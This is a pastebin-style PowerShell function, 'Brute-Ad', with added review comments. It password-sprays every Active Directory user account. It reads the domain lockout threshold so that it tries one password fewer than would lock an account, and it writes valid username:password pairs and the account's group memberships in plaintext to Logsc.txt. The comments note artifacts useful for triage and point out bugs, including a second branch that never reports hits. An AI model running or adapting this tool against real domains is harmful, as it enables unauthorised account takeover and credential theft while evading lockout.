
Untitled

danj666 Sep 22nd, 2019 267 Never
  1. <#
  2. .Synopsis
  3.     Brute forces active directory user accounts
  4. .DESCRIPTION
  5.     Brute forces active directory user accounts
  6. .EXAMPLE
  7.     PS C:\> Brute-Ad
  8.     Bruteforce all accounts in AD with a given password or list of passwords.
  9. .EXAMPLE
  10.     Brute-Ad -list password1,password2,'$password$','$Pa55w0rd$'
  11.     Brute force all accounts in AD with a provided list of passwords.
  12. .EXAMPLE
  13.     Brute-Ad -List password1
  14.     Brute force all accounts in AD with just one password.
  15. .EXAMPLE
  16.     Brute-Ad -list Password1,password2,'$password$','$Pa55w0rd$',password12345
  17.     The provided list will be used:  Password1 password2 $password$ $Pa55w0rd$ password12345
  18. .EXAMPLE
  19.     Brute-Ad -list Password1,password2 -domain test.ad.com
  20.  
  21.     Username        Password   IsValid
  22.     --------        --------   -------
  23.     {Administrator} $Pa55w0rd$ True  
  24.     {jdoe}          Password1  True
  25. #>
# Enumerates every user object the DirectorySearcher returns and calls
# PrincipalContext.ValidateCredentials on each one with each candidate
# password. The number of passwords tried per account is capped from the
# domain's MaxBadPasswordsAllowed (see Get-LockOutThreshold below).
#
# Artifacts this leaves behind (useful when triaging a host where it ran):
#   - a file named Logsc.txt in the current working directory, appended to
#     on every valid credential (default-domain branch only);
#   - "username:password" lines on the console / output stream;
#   - one authentication attempt per (user, password) pair against the domain
#     controller. NOTE(review): presumably these surface as failed-logon /
#     credential-validation events on the DC (e.g. 4625 / 4776) — confirm in a
#     lab, the protocol ValidateCredentials negotiates is not visible here.
#
# Parameters:
#   $list   - [string[]] candidate passwords; defaults to @('Password1').
#   $domain - optional domain name or FQDN prefix; when omitted the caller's
#             $env:USERDOMAIN is used and the default naming context is searched.
function Brute-Ad
{
[cmdletbinding()]
Param
(
        [string[]]$list,
        $domain
)
    Write-Output ""
    Write-Output "[+] Brute-ad module started"
    Write-Output ""
    # Password source: caller-supplied list, else the single built-in value.
    if ($list)
        {
        $allpasswords = $list
        Write-Output 'The provided list will be used: '$allpasswords`n
        }
        else
        {
        $allpasswords = @('Password1')
        Write-Output 'The built-in list will be used: '$allpasswords`n
        }
 
    # Reads the domain account-lockout threshold through the WinNT provider
    # and projects it under a long display name that is dereferenced below.
    # The $domain assignment here is function-local (PowerShell creates a new
    # variable in the nested function's scope), so the outer $domain is unchanged.
    # $Name is assigned but never used.
    Function Get-LockOutThreshold  
    {
        $domain = [ADSI]"WinNT://$env:userdomain"
        $Name = @{Name='DomainName';Expression={$_.Name}}
        $AcctLockoutThreshold = @{Name='Account Lockout Threshold (Invalid logon attempts)';Expression={$_.MaxBadPasswordsAllowed}}
        $domain | Select-Object $AcctLockoutThreshold
    }
 
    $lockout = Get-LockOutThreshold
 
    # One credential-validation attempt. Returns a PSObject with Username,
    # Password and IsValid (the boolean result rendered as a string, so the
    # later `-eq $True` comparisons compare against "True"/"False" text).
    # Each call opens a new PrincipalContext against $domain.
    Function Test-ADCredential
    {
        Param($username, $password, $domain)
        Add-Type -AssemblyName System.DirectoryServices.AccountManagement
        $ct = [System.DirectoryServices.AccountManagement.ContextType]::Domain
        $pc = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ct, $domain)
        $object = New-Object PSObject | Select-Object -Property Username, Password, IsValid
        $object.Username = $username;
        $object.Password = $password;
        $object.IsValid = $pc.ValidateCredentials($username, $password).ToString();
        return $object
    }
   
    $username = ''
 
    $lockoutthres =  $lockout.'Account Lockout Threshold (Invalid logon attempts)'
 
    # Cap the passwords tried per account below the lockout threshold.
    # `!$lockoutthres` is true both for a threshold of 0 (no lockout policy)
    # and when the lookup above returned nothing, so either case uses the
    # full list. The parenthesised `-=` in the final branch evaluates to the
    # decremented value, i.e. threshold - 1 passwords are selected.
    if (!$lockoutthres)
    {
        $passwords = $allpasswords #no lockout threshold
    }
    elseif ($lockoutthres -eq 1)
    {
        $passwords = $allpasswords | Select-Object -First 1
    }
    else
    {
        $passwords = $allpasswords | Select-Object -First ($lockoutthres -=1)
    }
 
    # Branch 1: no -domain given. Search the default naming context via the
    # ADSI root, substitute %username%/%domain% placeholders, and log hits.
    if (!$domain)
    {
        $domain = $env:USERDOMAIN
        $DirSearcher = New-Object System.DirectoryServices.DirectorySearcher([adsi]'')
        $DirSearcher.Filter = '(&(objectCategory=Person)(objectClass=User))'
        $DirSearcher.FindAll().GetEnumerator() | ForEach-Object{
 
            # NOTE(review): Properties.samaccountname looks like a value
            # collection rather than a plain string — the help example above
            # prints it as {Administrator}; the .ToLower()/.ToUpper() calls
            # below assume string semantics. Confirm on a live result.
            $username = $_.Properties.samaccountname
            foreach ($password in $passwords)
            {
                # Placeholder expansion; case of the token selects the case of
                # the substituted value. Only this branch performs it.
                if ($password.Contains("%username%") -eq $True)
                {
                    $password = $password.Replace("%username%", $username.ToLower());
                }
                if ($password.Contains("%Username%") -eq $True)
                {
                    $password = $password.Replace("%Username%", $username.ToLower());
                    # String.Replace(char, char) replaces every occurrence of the
                    # first character, not just the one at index 0.
                    $password = $password.Replace($password[0],$password[0].ToString().ToUpper());
                }
                if ($password.Contains("%USERNAME%") -eq $True)
                {
                    $password = $password.Replace("%USERNAME%", $username.ToUpper());
                }
                if ($password.Contains("%Domain%") -eq $True)
                {
                    $password = $password.Replace("%Domain%", $domain);
                }
                if ($password.Contains("%domain%") -eq $True)
                {
                    $password = $password.Replace("%domain%", $domain.ToLower());
                }
                $result = Test-ADCredential -username $username -password $password -domain $domain
                # On a valid credential: look up the account's memberOf, reduce
                # each DN to its CN, and append the hit and its groups to
                # .\Logsc.txt (plaintext credential on disk) before echoing it.
                $result | Where {$_.IsValid -eq $True} | ForEach {
                 $usergroups = (New-Object System.DirectoryServices.DirectorySearcher("(&(objectCategory=User)(samAccountName=$($username)))")).FindOne().GetDirectoryEntry().memberOf -replace '^CN=([^,]+).+$','$1'
                 Add-Content -Path .\Logsc.txt "[!]SPRAY FOUND"
                 Add-Content -Path .\Logsc.txt  "*  $username`:$password"
                 Add-Content -Path .\Logsc.txt "[-]USER GROUPS"
                 Add-Content -Path .\Logsc.txt "$usergroups"
                 Add-Content -Path .\Logsc.txt "============================================================================"
                 echo "$username`:$password"
                }
            }
        }
    # Branch 2: -domain given. Resolve it against the current forest's domain
    # list by prefix match, then search that domain's LDAP root.
    } else {
        $forest= [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
        $domainname= $forest.Domains | ? {$_.Name -like "$($domain)*"}
        # Ambiguous prefix: report the candidates and do nothing.
        if ($domainname.Count -gt 1) {
            echo "[-] More than one match for domain: *$($domain)*"
            echo "Please use FQDN"
            echo $domainname
        } else {
            $domainDN=$domainname.GetDirectoryEntry().distinguishedName
            $Searcher=New-Object System.DirectoryServices.DirectorySearcher([ADSI]"LDAP://$domainDN")
            $Searcher.Filter = '(&(objectCategory=Person)(objectClass=User))'
            $domain = $domainname.name
            $Searcher.FindAll().GetEnumerator() | ForEach-Object{
 
                $username = $_.Properties.samaccountname
                foreach ($password in $passwords)
                {
                    # `echo` receives five separate arguments here ($username,
                    # "+", " -- ", "+", $password), so each is emitted as its
                    # own output item rather than one concatenated line.
                    echo $username + " -- " + $password;
                    # Test-ADCredential's object is piped into Start-Sleep, which
                    # emits nothing, so $result holds no output and the filter
                    # on the next line passes nothing through. No placeholder
                    # expansion and no Logsc.txt write happen in this branch.
                    $result = Test-ADCredential -username $username -password $password -domain $domain | Start-Sleep -m 500
                    $result | Where {$_.IsValid -eq $True}
                }
            }
        }
 
    }
 
    Write-Output ""
    Write-Output "[+] Module completed"
}